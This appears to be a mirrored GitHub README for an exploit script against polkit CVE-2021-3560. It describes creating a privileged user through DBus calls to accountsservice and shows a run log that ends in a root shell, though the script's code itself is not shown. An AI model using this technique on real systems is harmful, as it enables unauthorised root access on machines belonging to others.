Polkit-exploit - CVE-2021-3560
Privilege escalation with polkit - CVE-2021-3560
Summary
CVE-2021-3560 is an authentication bypass on polkit, which allows unprivileged user to call privileged methods using DBus, in this exploit we will call 2 privileged methods provided by accountsservice (CreateUser and SetPassword), which allows us to create a priviliged user then setting a password to it and at the end logging as the created user and then elevate to root.
Exploit Code Author
Ahmad Almorabea @almorabea http://almorabea.net
Usage
[email protected]:~/Desktop$ python3 CVE-2021-3560.py
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original Exploit Author: Kevin Backhouse
For more details check this: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/#history
[+]Starting the Exploit
[+] User Created with the name of ahmed
[+] Timed out at: 0.008446890996407191
[+] Timed out at: 0.008934336684707084
[+] Exploit Completed, your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root
bash: cannot set terminal process group (46983): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/home/test/Desktop# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/home/test/Desktop# whoami
root
[email protected]:/home/test/Desktop#
Demo
GUI Authentication
Terminal Authentication
Credit
Kevin Backhouse (https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/)
75 Nov 25, 2022
7 Feb 26, 2022
2 Nov 28, 2022
4 Aug 17, 2022
795 Dec 29, 2022
14 Dec 23, 2022
123 Dec 19, 2022
2.1k Jan 08, 2023
12 Nov 22, 2022
1 Jan 30, 2022
1 Jan 09, 2022
12 Nov 09, 2022
82 Nov 09, 2022
213 Dec 30, 2022
1 Nov 24, 2022
81 Dec 23, 2022
2 Mar 15, 2022
2 Dec 30, 2021
![Risky [ Zero Tow ]](https://avatars.githubusercontent.com/u/76860656?v=4&s=60)
7 Dec 25, 2022
820 Dec 18, 2022